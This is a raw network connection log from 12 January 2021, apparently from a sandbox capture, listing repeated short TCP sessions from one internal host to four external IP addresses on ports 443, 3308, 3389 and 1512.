Jan 12, 2021 01:45:11.265546083 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.317838907 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.318042040 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.319626093 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.371648073 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.386787891 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.386945963 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.400895119 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.455625057 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.455920935 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.465555906 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.465760946 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.517959118 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.518263102 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.570509911 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.688774109 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.688819885 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.689213991 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.694757938 CET	49297	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:11.747077942 CET	443	49297	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:11.812231064 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.855564117 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:11.855859041 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.857630014 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.900813103 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:11.911557913 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:11.911602020 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:11.911685944 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.911721945 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.927345037 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.972155094 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:11.972367048 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.982045889 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:11.982357025 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:12.025523901 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:12.025801897 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:12.065346956 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:12.069169044 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:12.069221020 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:12.182020903 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:12.182065010 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:12.182466984 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:12.188055038 CET	49298	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:12.231208086 CET	3308	49298	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:12.300272942 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.354674101 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.354799032 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.356255054 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.413634062 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.436506987 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.436553001 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.436625004 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.436674118 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.450383902 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.509238958 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.509480953 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.519721031 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.519967079 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.574076891 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.574188948 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.613214970 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.628192902 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.628232002 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.722516060 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.722560883 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.722615957 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.722661972 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.726799011 CET	49299	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:12.780857086 CET	3389	49299	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:12.845083952 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:12.898221970 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:12.898359060 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:12.900063038 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:12.953208923 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:12.960035086 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:12.960081100 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:12.960202932 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:12.960253000 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:12.976013899 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:13.030318975 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:13.030775070 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:13.040822029 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:13.041182041 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:13.094228983 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:13.094608068 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:13.130517960 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:13.147757053 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:13.248239994 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:13.248286009 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:13.248666048 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:13.254281044 CET	49300	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:13.307368994 CET	1512	49300	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:13.374922037 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.426965952 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.427171946 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.428698063 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.480551958 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.495340109 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.495544910 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.510529041 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.564842939 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.565237045 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.575413942 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.575754881 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.627691984 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.628072977 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.680202007 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.798228025 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.798273087 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.798652887 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.804496050 CET	49301	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:13.856470108 CET	443	49301	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:13.922000885 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:13.965436935 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:13.965750933 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:13.967416048 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.010626078 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.021716118 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.021764994 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.021889925 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.021941900 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.035803080 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.080821991 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.081046104 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.091370106 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.091733932 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.134902000 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.135194063 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.174426079 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.178549051 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.178591013 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.290474892 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.290522099 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.290919065 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.296818018 CET	49302	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:14.340162992 CET	3308	49302	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:14.422353983 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.477277994 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.477473021 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.479099035 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.533298016 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.555571079 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.555666924 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.555717945 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.555773973 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.567995071 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.628981113 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.629287958 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.638806105 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.639024973 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.693245888 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.693509102 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.733218908 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.747704983 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.747747898 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.836410999 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.836455107 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.836620092 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.836657047 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.843841076 CET	49303	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:14.898317099 CET	3389	49303	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:14.952220917 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.005356073 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.005573988 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.006694078 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.059679985 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.066381931 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.066420078 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.066517115 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.066561937 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.081562042 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.135818958 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.136169910 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.146455050 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.146752119 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.199704885 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.200059891 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.238548994 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.253488064 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.253531933 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.353879929 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.353924990 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.354316950 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.360006094 CET	49304	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:15.413088083 CET	1512	49304	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:15.482506037 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.534940004 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.535110950 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.536845922 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.589005947 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.603847027 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.604118109 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.622571945 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.677320957 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.677607059 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.687196970 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.687526941 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.739898920 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.740200043 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.792685986 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.911264896 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.911313057 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:15.911715031 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.917342901 CET	49305	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:15.969508886 CET	443	49305	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:16.027286053 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.070750952 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.070981026 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.072700024 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.115941048 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.126558065 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.126616001 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.126746893 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.126795053 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.141076088 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.186956882 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.187258005 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.197524071 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.197655916 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.240729094 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.241050005 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.280642986 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.284204960 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.284248114 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.397955894 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.398000002 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.398343086 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.403914928 CET	49306	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:16.447304964 CET	3308	49306	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:16.511600018 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.566457033 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.566623926 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.568149090 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.621823072 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.640695095 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.640746117 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.640887022 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.640928984 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.652983904 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.711759090 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.711919069 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.721935987 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.722042084 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.775746107 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.776042938 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.815299988 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.830106020 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.830149889 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.927069902 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.927119970 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:16.927433968 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.927484035 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.933057070 CET	49307	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:16.986972094 CET	3389	49307	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:17.043221951 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.096226931 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.096451044 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.111953020 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.164830923 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.171854973 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.171896935 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.172069073 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.172121048 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.186604977 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.240724087 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.240861893 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.247087955 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.247180939 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.300081968 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.300210953 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.338449001 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.353235006 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.353277922 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.454430103 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.454478025 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.454813004 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.460726023 CET	49308	1512	192.168.2.22	46.105.131.65
Jan 12, 2021 01:45:17.513659954 CET	1512	49308	46.105.131.65	192.168.2.22
Jan 12, 2021 01:45:17.575541973 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.627814054 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.628108978 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.629842997 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.681864977 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.696660042 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.696845055 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.710968018 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.765557051 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.765860081 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.776103020 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.776572943 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.828859091 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.829258919 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:17.881592035 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.999114990 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.999171972 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:17.999460936 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:18.005441904 CET	49309	443	192.168.2.22	77.220.64.37
Jan 12, 2021 01:45:18.057696104 CET	443	49309	77.220.64.37	192.168.2.22
Jan 12, 2021 01:45:18.119961023 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.163409948 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.163652897 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.165565014 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.208590031 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.229357004 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.229429960 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.229481936 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.229548931 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.243813038 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.288803101 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.289160013 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.299927950 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.300371885 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.343698025 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.344007969 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.383718967 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.387393951 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.387451887 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.499445915 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.499491930 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.499823093 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.505491972 CET	49310	3308	192.168.2.22	80.86.91.27
Jan 12, 2021 01:45:18.548736095 CET	3308	49310	80.86.91.27	192.168.2.22
Jan 12, 2021 01:45:18.617968082 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.672581911 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.672719002 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.674298048 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.728374004 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.751789093 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.751849890 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.751986027 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.752036095 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.765748978 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.827862024 CET	3389	49311	5.100.228.233	192.168.2.22
Jan 12, 2021 01:45:18.828069925 CET	49311	3389	192.168.2.22	5.100.228.233
Jan 12, 2021 01:45:18.845489025 CET	49311	3389	192.168.2.22	5.100.228.233
